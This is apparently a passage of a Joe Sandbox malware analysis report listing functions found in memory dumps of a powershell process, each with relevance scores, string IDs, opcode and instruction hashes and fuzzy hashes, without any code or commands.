                                                                                                                                      • Opcode Fuzzy Hash: 3323d45f924237139a103c08a2512f5b244b04e25378628ab6928ad7d1fb3606
                                                                                                                                      • Instruction Fuzzy Hash: 94124CB1B243478FD7159B68981976ABBA2EFC5210F14C4BBD905CB391DA31CC82C7A2
                                                                                                                                      Function 07264F40 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q$4'q
                                                                                                                                      • API String ID: 0-4210068417
                                                                                                                                      • Opcode ID: b14f123c868388bd8d61100e6c02f0ec46ae6e40efe6fa68cf67cf51ccd305da
                                                                                                                                      • Instruction ID: 90bee27ecd42417a0a6d3b5001c737f038526cd91969d7cc85dd67adf807d01c
                                                                                                                                      • Opcode Fuzzy Hash: b14f123c868388bd8d61100e6c02f0ec46ae6e40efe6fa68cf67cf51ccd305da
                                                                                                                                      • Instruction Fuzzy Hash: 49E1B3B0B102069FDB14DF69C554BAEBBA3EF89300F24C569D9116F395CB71EC828B91
                                                                                                                                      Function 0726CEA6 Relevance: 5.0, Strings: 3, Instructions: 1234COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$4'q
                                                                                                                                      • API String ID: 0-3126650252
                                                                                                                                      • Opcode ID: 33981344f411cedb432697abc595adb81808cdf7f3178b14db5a38df4037bc7b
                                                                                                                                      • Instruction ID: cafcade1c7a7ed80af184a767019ca1a5f2e007b98485c874aa03d711d4598d4
                                                                                                                                      • Opcode Fuzzy Hash: 33981344f411cedb432697abc595adb81808cdf7f3178b14db5a38df4037bc7b
                                                                                                                                      • Instruction Fuzzy Hash: 36C2B3B4B003189FD724DF54C894B9AB7B2EF85304F10C5A9D51AAB790CB72ED828F91
                                                                                                                                      Function 07260840 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q$$q
                                                                                                                                      • API String ID: 0-3067366958
                                                                                                                                      • Opcode ID: 4b51768ecf387e3d345d070c91a43c31035f3aedab70624323c9e7bdb26b2dec
                                                                                                                                      • Instruction ID: ec9c4fd1e7f4022eeac2d8262928aefc00f7a376ed2d697940036f60f05eea0d
                                                                                                                                      • Opcode Fuzzy Hash: 4b51768ecf387e3d345d070c91a43c31035f3aedab70624323c9e7bdb26b2dec
                                                                                                                                      • Instruction Fuzzy Hash: 6A416CB2B20217CFDB349A69980566EF7A1EF84A10F24852BDC05E7340EB31DD81C7E5
                                                                                                                                      Function 07264520 Relevance: 3.0, Strings: 2, Instructions: 467COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q
                                                                                                                                      • API String ID: 0-1467158625
                                                                                                                                      • Opcode ID: 3be4e3c3c6ea16b99ba72c6c76e52f2ea88b901345138270595620c56f4d1ba4
                                                                                                                                      • Instruction ID: 89696789de42e97862fa755eacc523acfb43e111632f42595318c08854a78069
                                                                                                                                      • Opcode Fuzzy Hash: 3be4e3c3c6ea16b99ba72c6c76e52f2ea88b901345138270595620c56f4d1ba4
                                                                                                                                      • Instruction Fuzzy Hash: 6712ABB4B21245AFDB04DB98D494F9DBBB2EF85314F20C199E9056F391C772ED828B41
                                                                                                                                      Function 07264F20 Relevance: 2.8, Strings: 2, Instructions: 305COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q
                                                                                                                                      • API String ID: 0-1467158625
                                                                                                                                      • Opcode ID: a197a3998915499470f38179acf52b4b18df05307f8c55472978e17c195daeea
                                                                                                                                      • Instruction ID: 284905c8d64a3c413bdac48a59da34f84c8059ed563caf6b1ee9fe70a66215a8
                                                                                                                                      • Opcode Fuzzy Hash: a197a3998915499470f38179acf52b4b18df05307f8c55472978e17c195daeea
                                                                                                                                      • Instruction Fuzzy Hash: 6CC1C1B0A102069FDB14DF59C554BAEBBB3EF89304F24C55AD9016F395CB72EC828B91
                                                                                                                                      Function 07264F08 Relevance: 2.8, Strings: 2, Instructions: 280COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q
                                                                                                                                      • API String ID: 0-1467158625
                                                                                                                                      • Opcode ID: 585ae1ba715b11ca7f4c90a82e58f5739e92186b2fbda4adf2f485db539a7683
                                                                                                                                      • Instruction ID: 7f0358d04728116172f350dad421c6ff35b8a82b4a29e2a8facf22b0f0e7c8eb
                                                                                                                                      • Opcode Fuzzy Hash: 585ae1ba715b11ca7f4c90a82e58f5739e92186b2fbda4adf2f485db539a7683
                                                                                                                                      • Instruction Fuzzy Hash: DEB1B0B0A102069FDB14DF59C554BADBBB3EF88304F24C55AD8156F395CB72EC828B91
                                                                                                                                      Function 072609C8 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: tPq$tPq
                                                                                                                                      • API String ID: 0-4270251778
                                                                                                                                      • Opcode ID: fab145d504a1620eda506d7942c61cfb8d6fd9d68e0f476d146847c4c6789d8f
                                                                                                                                      • Instruction ID: 6d9356f0005a497475318cd10837a786969a60a44ed82169aecd29a70bbde007
                                                                                                                                      • Opcode Fuzzy Hash: fab145d504a1620eda506d7942c61cfb8d6fd9d68e0f476d146847c4c6789d8f
                                                                                                                                      • Instruction Fuzzy Hash: F6519D717243478FDB318A65C815F6ABBA2AFC2311F18C06BD645CB281DA71DC81D3B1
                                                                                                                                      Function 07260822 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q
                                                                                                                                      • API String ID: 0-3126353813
                                                                                                                                      • Opcode ID: e04aa249e3aa6755e97162986c2725de70ae436150dbc8d50b21921935f14d87
                                                                                                                                      • Instruction ID: f6db5fbb0e3af111de0fa095106bb17266873bab9fbe554125a278852d538209
                                                                                                                                      • Opcode Fuzzy Hash: e04aa249e3aa6755e97162986c2725de70ae436150dbc8d50b21921935f14d87
                                                                                                                                      • Instruction Fuzzy Hash: C72145B6924317DFCB31CF699904AA9BBF0EF05A10F294197DC48E7202D3309980D7E5
                                                                                                                                      Function 07263FE2 Relevance: 2.1, Strings: 1, Instructions: 888COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: 41ba65e11797e8b2fef22d8d05625bf74eeb4cd0c7009c5f609f2ee931256c49
                                                                                                                                      • Instruction ID: df7db49dca88f7de16d989cc43612ea06296aa806d8a7153e2b955e6f8245d86
                                                                                                                                      • Opcode Fuzzy Hash: 41ba65e11797e8b2fef22d8d05625bf74eeb4cd0c7009c5f609f2ee931256c49
                                                                                                                                      • Instruction Fuzzy Hash: 0C82CFB0A10255DFDB20DF14C894BAAB7B2EF85304F10C5AAD55AAB751CB31ED82CF51
                                                                                                                                      Function 072631B9 Relevance: 2.1, Strings: 1, Instructions: 818COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: 9bb8f78060066f483435a010402096643edd026ca62a06a5edffd26a13052b04
                                                                                                                                      • Instruction ID: 5a495b3f1ef735450e09fc588c511ba948c57352c3f6905ec4fb914e66195f51
                                                                                                                                      • Opcode Fuzzy Hash: 9bb8f78060066f483435a010402096643edd026ca62a06a5edffd26a13052b04
                                                                                                                                      • Instruction Fuzzy Hash: 99729DB0A10215DFDB24CF54C854BAAB7B2FF85304F10C5AAD95A6B791CB32AD82CF51
                                                                                                                                      Function 072641B7 Relevance: 1.9, Strings: 1, Instructions: 645COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: 678872cbd4ee90a4329aa8a5e665547c9eccf89288a7167aa954ed5e51159ff9
                                                                                                                                      • Instruction ID: d06a690450d4299d2ace0b5d455fd1e6a33c8cab6fccbfb43706b92431d7b6f2
                                                                                                                                      • Opcode Fuzzy Hash: 678872cbd4ee90a4329aa8a5e665547c9eccf89288a7167aa954ed5e51159ff9
                                                                                                                                      • Instruction Fuzzy Hash: EC529EB0A10215DFDB20DF14C954BAAB7B2FB85304F10C5AAD55AAB791CB32ED82CF51
                                                                                                                                      Function 0726D067 Relevance: 1.9, Strings: 1, Instructions: 627COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: 098326d43ef7edd95aa0d16f5dd68fa0764239d6f5e52e75f778d45ac8e3760e
                                                                                                                                      • Instruction ID: cb2f492eb10041c62c044cb6d5a14f7fb2a539c587d54ea6bfade562b69c688e
                                                                                                                                      • Opcode Fuzzy Hash: 098326d43ef7edd95aa0d16f5dd68fa0764239d6f5e52e75f778d45ac8e3760e
                                                                                                                                      • Instruction Fuzzy Hash: CA42D4B4B003189FD724DF54C990B9AB7B2EF84304F10C5A9D51AAB795CB36ED828F91
                                                                                                                                      Function 0726D2FC Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: da8232fed9eb1c59126effb9bfd8d5ae7ebeabd66c8c8419c1af0f4bb90542aa
                                                                                                                                      • Instruction ID: ac5d92664a9efa4940a1f72de45b80e2251237cac482d71bd018dc728ecb07d6
                                                                                                                                      • Opcode Fuzzy Hash: da8232fed9eb1c59126effb9bfd8d5ae7ebeabd66c8c8419c1af0f4bb90542aa
                                                                                                                                      • Instruction Fuzzy Hash: 8D121DB0B2021ADFDB25DF14C854BA9B7B2EB45304F1084AAD51AAB794CB71EDC2CF51
                                                                                                                                      Function 0726D0F1 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: b17a589ef484ecd86a94f58a194c6e385742245d31be99ee10d48e6f5f0264fa
                                                                                                                                      • Instruction ID: 8a2c98ecdd96ceb0519f6c8b7fb2403b66cc6cc7d9d898ad9daabd26b3211ed9
                                                                                                                                      • Opcode Fuzzy Hash: b17a589ef484ecd86a94f58a194c6e385742245d31be99ee10d48e6f5f0264fa
                                                                                                                                      • Instruction Fuzzy Hash: 58121DB0B2021ADFDB25DF14C854BA9B7B2EB45304F1084AAD51AAB790CB71EDC2CF51
                                                                                                                                      Function 02B7EEBA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: b944de2993bfe44d93577cd0dd2d74cca58db118981f0092fe81721aaa289d3f
                                                                                                                                      • Instruction ID: fdc7e5c2fa861eef7f94b8485798a94a362921174b3aed351fb434f34cb2fe28
                                                                                                                                      • Opcode Fuzzy Hash: b944de2993bfe44d93577cd0dd2d74cca58db118981f0092fe81721aaa289d3f
                                                                                                                                      • Instruction Fuzzy Hash: 080126343443402FD718E725AC55B6A7B63AFC1B01F144569E4024F386DE70BC0A87A0
                                                                                                                                      Function 02B7EEC8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q
                                                                                                                                      • API String ID: 0-1807707664
                                                                                                                                      • Opcode ID: 2026ac4e235e15236cb4959f837759f093ddaa74feec9445c1e34bde0e43eb0e
                                                                                                                                      • Instruction ID: eb9d2a69fd3b2aac84ff3766ae9174641b326952fc2862d8f146311dc3efd9c7
                                                                                                                                      • Opcode Fuzzy Hash: 2026ac4e235e15236cb4959f837759f093ddaa74feec9445c1e34bde0e43eb0e
                                                                                                                                      • Instruction Fuzzy Hash: 38F0F0303803102BE628A666AC55B6E7B97ABC4A10F64497CE5064F38ACEB0AC0E4794
                                                                                                                                      Function 02B795A8 Relevance: .3, Instructions: 320COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 83121ed6470c2daa1cc67892972c5a3082b388a63f5c15be15cc1274d6c23ad7
                                                                                                                                      • Instruction ID: 27961ad1c0e349f52806d30ee5fdd542cd85586667ab7700a32f05cfa4b0e342
                                                                                                                                      • Opcode Fuzzy Hash: 83121ed6470c2daa1cc67892972c5a3082b388a63f5c15be15cc1274d6c23ad7
                                                                                                                                      • Instruction Fuzzy Hash: 77D14974E01248DFDB15CFA8D484AADBBF2EF49314F248199E815AB362C731ED46CB90
                                                                                                                                      Function 02B772A8 Relevance: .3, Instructions: 317COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8067fbef92240b44f233bd8695ddfc10d412ae0b8b53916566275c5a313d6041
                                                                                                                                      • Instruction ID: 7f6b3a4ba3095c0753b4271db72ead1a4e96bd580e70fd5c7808fb1402ae93c6
                                                                                                                                      • Opcode Fuzzy Hash: 8067fbef92240b44f233bd8695ddfc10d412ae0b8b53916566275c5a313d6041
                                                                                                                                      • Instruction Fuzzy Hash: AFC19F35A002089FCB14DFA8D944AADFBF2FF84314F158599E416AB365DB34ED4ADB80
                                                                                                                                      Function 07265A28 Relevance: .2, Instructions: 231COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 122200930fc098d6471bdf8ccfbdeaa3d318bfe0022b605ec2eb84d4027527e2
                                                                                                                                      • Instruction ID: e2b1b8001eb2b33c6722749fb9b2dcd984b43c7d1b9a78eb6d9918206aca9c6b
                                                                                                                                      • Opcode Fuzzy Hash: 122200930fc098d6471bdf8ccfbdeaa3d318bfe0022b605ec2eb84d4027527e2
                                                                                                                                      • Instruction Fuzzy Hash: E0715CB1B203079FCB249B2AD84576ABFE1EF81210F18847BD945DB281EB35D991C7B1
                                                                                                                                      Function 02B72AA0 Relevance: .2, Instructions: 229COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b1c1d43d79fa4cbfcc96bdc389594a67699dcd180b4f0c2ac24e8e54ca0679f0
                                                                                                                                      • Instruction ID: dbaaf2ab9ab404eea8475dcc0047b8e276ec6aa7a6292034ffc7df7ce94c1282
                                                                                                                                      • Opcode Fuzzy Hash: b1c1d43d79fa4cbfcc96bdc389594a67699dcd180b4f0c2ac24e8e54ca0679f0
                                                                                                                                      • Instruction Fuzzy Hash: C5A1A070A042458FCB15CF68C4D4AAAFBB1FF49314B24869AD865DB3A1C735FC51CBA0
                                                                                                                                      Function 02B77A70 Relevance: .2, Instructions: 194COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9a92079a797d42b8b3bf0581bccbb696b942702d1d93df378fc43e8e6efe35da
                                                                                                                                      • Instruction ID: 8e33b25493a515ac0f768a41e18c86ac128f8f4e2217563ad80cb3e5a64fd56c
                                                                                                                                      • Opcode Fuzzy Hash: 9a92079a797d42b8b3bf0581bccbb696b942702d1d93df378fc43e8e6efe35da
                                                                                                                                      • Instruction Fuzzy Hash: 9171AD30A002098FDB14DF68C884AAEFBF6EF85314F1489AAD415DB750DF71AC46CB80
                                                                                                                                      Function 02B77BDE Relevance: .2, Instructions: 188COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e417e82a4391fd102933e62f87c738b31200242f8eb7475a1a7cd01135a89b4a
                                                                                                                                      • Instruction ID: 5735d32d00a9c6e6c029740a7a3841bf21d4f0c266029b387a7d50b98d9883d5
                                                                                                                                      • Opcode Fuzzy Hash: e417e82a4391fd102933e62f87c738b31200242f8eb7475a1a7cd01135a89b4a
                                                                                                                                      • Instruction Fuzzy Hash: C1711C70E002089FDB14DFA9D594AADBBB2FF88304F148469D411AB790DF35AD46DB91
                                                                                                                                      Function 07267F46 Relevance: .1, Instructions: 126COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf0eb0bfac429631b12091bf3a916e5c46027206c9837a17585bbef805a80e13
                                                                                                                                      • Instruction ID: 3ea2c25bcb573f85feb66bf6f4d404b93ae50657576957c35aadf57b8ee33669
                                                                                                                                      • Opcode Fuzzy Hash: cf0eb0bfac429631b12091bf3a916e5c46027206c9837a17585bbef805a80e13
                                                                                                                                      • Instruction Fuzzy Hash: 3941DAF1A24203DFC7159F149955A6A7BB2EF85244F1984ABD9009B3A1D731DCC2C7A2
                                                                                                                                      Function 02B7B6F1 Relevance: .1, Instructions: 124COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bd34f4286f5e9b2fc7c0ceb50d4f1cad66b0b0b9a577b487474da4ac702430cb
                                                                                                                                      • Instruction ID: 738a03aba686c5b1322e6a64026ef9fc9f71d27d7dcebb47800fa3798c6f12b7
                                                                                                                                      • Opcode Fuzzy Hash: bd34f4286f5e9b2fc7c0ceb50d4f1cad66b0b0b9a577b487474da4ac702430cb
                                                                                                                                      • Instruction Fuzzy Hash: 12411D30A002049FDB14DB69C554BAEBBF7EF88351F198469D806AB795DF31AC468FA0
                                                                                                                                      Function 02B77801 Relevance: .1, Instructions: 124COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fcbb10671f674ad88bd37365d80623780ee67ce5839c2cd718f1719a116cf0a5
                                                                                                                                      • Instruction ID: ca0688763f531c755f1a370f912b7af95b401f9c9922e8228fb82c47d1a1f29b
                                                                                                                                      • Opcode Fuzzy Hash: fcbb10671f674ad88bd37365d80623780ee67ce5839c2cd718f1719a116cf0a5
                                                                                                                                      • Instruction Fuzzy Hash: AF417C31B402149FEB15DB75C9586AEBBB6EF89750F0444A8E416EB3A0DF30AD42DB90
                                                                                                                                      Function 02B7F00C Relevance: .1, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a2dec1273fc78794cf5acdec21102535d2c2bfad6e1120db76bb1e239789e40
                                                                                                                                      • Instruction ID: 7a22d1f096c386ae5c220f21119b4bdc8e4e2f1184b9c91caeb37e5de5892d6e
                                                                                                                                      • Opcode Fuzzy Hash: 3a2dec1273fc78794cf5acdec21102535d2c2bfad6e1120db76bb1e239789e40
                                                                                                                                      • Instruction Fuzzy Hash: DB513D34A00209CFDB14DF68D444AEE7BB2FF88315F149198D401AB7A5DB71EC86CBA1
                                                                                                                                      Function 02B7B700 Relevance: .1, Instructions: 119COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2036285119.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_2b70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8c3c80913349222869c2a650c2c94fa255b5a2aae55debdcec21c962ecff5f3e
                                                                                                                                      • Instruction ID: 4a132a202a08bc699d5a90f6cd26cc9c66e3be6cb03ec473b79433c420ad87e5
